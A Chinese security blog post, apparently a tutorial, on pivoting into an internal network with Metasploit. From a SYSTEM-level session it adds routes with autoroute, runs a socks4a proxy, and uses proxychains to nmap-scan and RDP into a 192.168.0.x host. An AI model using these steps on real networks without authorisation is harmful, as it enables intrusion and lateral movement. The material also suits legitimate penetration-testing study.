【内网穿透】metasploit跨路由进内网

admin 2022年1月10日03:32:43安全博客评论8 views833字阅读2分46秒阅读模式

前言

  • metasploit 通过增加路由来扫描对应端口

路由方式进内网

首先提权到了system权限

1、看有几个网段

1
run get_local_subnets

image-20210825101511830

2、增加一个网段的路由

1
2
3
4
run autoroute -s 192.168.0.0/24

// 查看当前路由
run autoroute -p

image-20210825101832048

3、保存sessions然后记住id,接着创建一个socks4a代理

1
use auxiliary/server/socks_proxy

image-20210825102647725

接着将VERSION设置为4a

1
set VERSION 4a

接着直接run,就成功设置了1080端口socks4a协议

image-20210825102726771

4、设置4a代理,利用proxychains4

1
vim /etc/proxychains.conf //设置ip地址

image-20210825102931404

接着就可以利用proxychains直接访问192.168.0.111的内网

1
proxychains4 nmap -sT -Pn -v 192.168.0.111

image-20210825103302020

接着当我们找出3389端口的密码之后,可以直接利用rdesktop来连接3389的远程桌面,xshell会自动帮你开启桌面窗口

1
proxychains4 rdesktop 192.168.0.111 //-g 1980*1080 这是调整分辨率的 -f 表示全屏

image-20210825105439505

这里说一点坑,由于我公网服务器并不是kali,只是centos的系统,所以需要安装rdesktop来进行远程登录

安装rdesktop

1、下载仓库文件

1
wget http://li.nux.ro/download/nux/dextop/el7/x86_64/nux-dextop-release-0-5.el7.nux.noarch.rpm

2、安装仓库

1
rpm -Uvh nux-dextop-release-0-5.el7.nux.noarch.rpm

3、安装远程桌面程序

1
yum install rdesktop -y

完成!

我的个人博客

孤桜懶契:http://gylq.gitee.io

FROM:gylq.gitee Author:孤桜懶契

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月10日03:32:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【内网穿透】metasploit跨路由进内网 http://cn-sec.com/archives/729997.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: